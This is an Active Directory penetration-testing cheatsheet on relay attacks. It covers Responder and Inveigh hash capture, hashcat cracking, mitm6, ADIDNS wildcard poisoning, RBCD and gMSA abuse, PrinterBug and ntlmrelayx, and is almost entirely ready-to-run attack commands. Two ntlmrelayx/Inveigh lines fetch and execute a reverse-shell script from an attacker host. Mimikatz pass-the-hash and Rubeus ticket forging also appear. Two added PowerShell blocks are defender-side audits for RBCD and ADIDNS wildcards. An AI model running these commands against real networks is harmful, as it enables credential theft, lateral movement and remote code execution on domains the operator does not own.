Here is another continuation of the Active Directory Penetration Testing cheatsheet. This time I am putting together a few of the common relay attacks that we observe in pentests and red-team assessments.
#Relay attacks - Capturing SMB hashes
Import-Module .\Inveigh.ps1
#Start collecting hashes; we will see hashes whenever a user tries to access something non-existent via SMB
Invoke-Inveigh -ConsoleOutput Y
#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
LLMNR Poisoning
#Start responder
python Responder.py -I ens160 -rdw
python3 Responder.py -I ens160 -wFb -v --lm --disable-ess
#cracking the hashes captured by responder
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Relay Attack using Responder
sudo python /usr/share/responder/Responder.py -I tun0 -A
git clone https://github.com/dirkjanm/krbrelayx.git
#adding a DNS Record
sudo python3 dnstool.py -u 'steins.local\username' -p 'P@ssw0rd!' -a add -r 'application.steins.local' -d ATTACKER_IP SERVER_IP
#wait for the victim to access our dns record :) you will get the user's NTLMv2 hash in responder
#crack the hash with john
john --format=netntlmv2 hash --wordlist=wordlist.txt
IPV6 Relay Attack
git clone https://github.com/dirkjanm/mitm6
cd mitm6
python -m pip install -r requirements.txt
#start mitm6
mitm6 -d domain.fqdn
#Start ntlmrelayx
ntlmrelayx.py -6 -t ldaps://DC_IPAddress -wh fakewpadname.domain.fqdn -l datadump
Also check out this article on abusing IPv6 via krbrelayx.py
Abusing ADIDNS and Relaying the Hashes
Import-module .\Invoke-DNSUpdate.ps1
Powershell Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.21.10 -Verbose
Import-module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
#Capture all the users hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.2.1 -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10:/rev.ps1')"
Resource Based Constrained Delegation on MSSQL Server
#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
#Login to the MSSQL Server and run xp_dirtree on the dnsname you just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
#on your Kali box, run rbcd_relay.py
sudo proxychains python rbcd_relay.py 192.168.1.2 steins.local SQL_server4$ USER
#expected output: msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER
#View the privileges of the user
Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,PrincipalsAllowedToDelegateToAccount,msDS-AllowedToDelegateTo,TrustedToAuthForDelegation
#Get a service ticket and gain access to the server
proxychains python3 ./getST.py -dc-ip 192.168.2.1 -spn cifs/server.steins.local -impersonate sql_admin steins.local/sql_user:Password@123
export KRB5CCNAME=sql_admin.ccache; sudo proxychains psexec.py steins.local/user@192.168.2.1 -k -no-pass -dc-ip 192.168.2.10 -target-ip 192.168.2.1
OR
.\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /ptt
dir \\server.steins.local\c$
psexec \\server.steins.local cmd.exe
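As an added, defender-side check (not part of the original cheatsheet): enumerate every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated and list the principals its descriptor allows, so an RBCD entry like the one rbcd_relay.py writes stands out during an audit. The function name and the default server dc.steins.local are assumptions; the ActiveDirectory RSAT module is assumed to be installed.

```powershell
Import-Module ActiveDirectory

function Get-RbcdDelegationAudit {
    param(
        [string]$Server = 'dc.steins.local'   # assumption: a DC for the steins.local lab
    )
    # Only computers that actually have the attribute populated are returned.
    $computers = Get-ADComputer -Server $Server `
        -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity'

    foreach ($c in $computers) {
        $sd = $c.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        # The AD module normally hands back an ActiveDirectorySecurity object; if the
        # raw security descriptor bytes come back instead, parse them explicitly.
        if ($sd -is [byte[]]) {
            $raw = $sd
            $sd  = New-Object System.DirectoryServices.ActiveDirectorySecurity
            $sd.SetSecurityDescriptorBinaryForm($raw)
        }
        # Each Allow ACE in the DACL is a principal permitted to act on behalf of
        # other users (S4U2Proxy) against this computer.
        $rules = $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($rule in $rules) {
            $sid = $rule.IdentityReference
            try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $name = '<unresolved>' }   # deleted or foreign-domain account
            [pscustomobject]@{
                Computer   = $c.Name
                Principal  = $name
                Sid        = $sid.Value
                AccessType = $rule.AccessControlType
                Rights     = $rule.ActiveDirectoryRights
            }
        }
    }
}

# Review the output; an unexpected principal is cleared with:
#   Set-ADComputer -Identity <computer> -PrincipalsAllowedToDelegateToAccount $null
Get-RbcdDelegationAudit | Format-Table -AutoSize
```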
Abusing GMSA by relaying
Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData Attacker_IP -Realm steins.local
#Invoke a web request from the service that is using GMSA
Invoke-WebRequest -uri "http://might.steins.local" -UseDefaultCredentials
#Start capturing the data using ntlmrelayx; if it's running as administrator, SAM hashes will be dumped
sudo proxychains ntlmrelayx.py --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://GMSA_running_machine_IP
#In case the data is shown as a password blob, you can use the below to convert it to an NTLM hash
(ConvertFrom-ADManagedPasswordBlob <blob>).SecureCurrentPassword | ConvertTo-NTHash
OR, if the user can read GMSA passwords, you can use gMSADumper.py to dump the hashes
python3 gMSADumper.py -u 'USERNAME' -p 'P@SSW0RD!' -d 'steins.local' -l 'dc.steins.local'
Abusing PrinterBug
#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
#Compromise and login to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'
#Run SpoolSample.exe on the unconstrained delegation enabled machine
SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDN
OR
proxychains python3 printerbug.py steins.local/guest@192.168.1.1 KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'
sudo proxychains ntlmrelayx.py -t smb://192.168.1.1 -smb2support
Abusing ADIDNS to Send traffic to the target
#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose
#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
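As an added, defender-side check (not part of the original cheatsheet) for the ADIDNS wildcard abuse shown here and in the earlier "Abusing ADIDNS and Relaying the Hashes" section: find any wildcard (*) dnsNode in the AD-integrated zone, report whether it is tombstoned, and flag ACEs that give broad groups such as Authenticated Users write or full control over it. The zone name, domain DN and function name are assumptions for the steins.local lab; the ActiveDirectory RSAT module (which provides the AD: drive) is assumed.

```powershell
Import-Module ActiveDirectory

function Get-AdidnsWildcardNode {
    param(
        [string]$Zone     = 'steins.local',        # assumption: lab zone name
        [string]$DomainDn = 'DC=steins,DC=local'   # assumption: lab domain DN
    )
    # Partitions in which an AD-integrated zone can be stored.
    $bases = @(
        "DC=$Zone,CN=MicrosoftDNS,DC=DomainDnsZones,$DomainDn",
        "DC=$Zone,CN=MicrosoftDNS,DC=ForestDnsZones,$DomainDn",
        "DC=$Zone,CN=MicrosoftDNS,CN=System,$DomainDn"
    )
    foreach ($base in $bases) {
        # '*' is escaped as \2a; an unescaped '*' would match every node name.
        $nodes = Get-ADObject -SearchBase $base -SearchScope OneLevel `
            -LDAPFilter '(&(objectClass=dnsNode)(name=\2a))' `
            -Properties dnsRecord, dNSTombstoned, whenCreated -ErrorAction SilentlyContinue
        foreach ($n in $nodes) {
            # -LiteralPath keeps PowerShell from expanding the '*' in the DN.
            $acl = Get-Acl -LiteralPath "AD:\$($n.DistinguishedName)"
            $broad = $acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $_.IdentityReference -match 'Authenticated Users|Everyone|Domain Users|Domain Computers' -and
                $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty|WriteDacl'
            }
            [pscustomobject]@{
                Node        = $n.DistinguishedName
                Tombstoned  = [bool]$n.dNSTombstoned   # Powermad's -Tombstone leaves this TRUE
                Created     = $n.whenCreated
                RecordCount = @($n.dnsRecord).Count
                BroadAces   = ($broad | ForEach-Object {
                                  "$($_.IdentityReference) => $($_.ActiveDirectoryRights)" }) -join '; '
            }
        }
    }
}

# Any wildcard node at all, and especially one writable by a broad group, matches
# what the Powermad commands above create; after confirming it is not legitimate,
# delete it with Remove-ADObject -Identity <DN>.
Get-AdidnsWildcardNode | Format-List
```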
Capturing Hashes using responder and cracking hashes
sudo proxychains responder -I tun0 -v
hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force
Relaying using ntlmrelayx
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory
# -c: execute the command
# -e: execute a binary
ntlmrelayx can automatically dump hashes when it can access an administrator account, so look out for the hashes in the output. Also, the Impacket 0.9.23-dev version has issues with ntlmrelayx; better to use the stable version.
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support
Useful commands
sudo proxychains ntlmrelayx.py -t smb://10.10.10.10 -l loot -i -smb2support -c "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')"
#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://USERNAME@192.168.2.1 -smb2support
Using Inveigh to Capture Hashes
Import-Module .\Inveigh.ps1
#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo
#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSCredential $Cred -ADIDNSDomain 192.168.2.10
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10
#Capturing Hashes on the target
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command "powershell.exe -c whoami"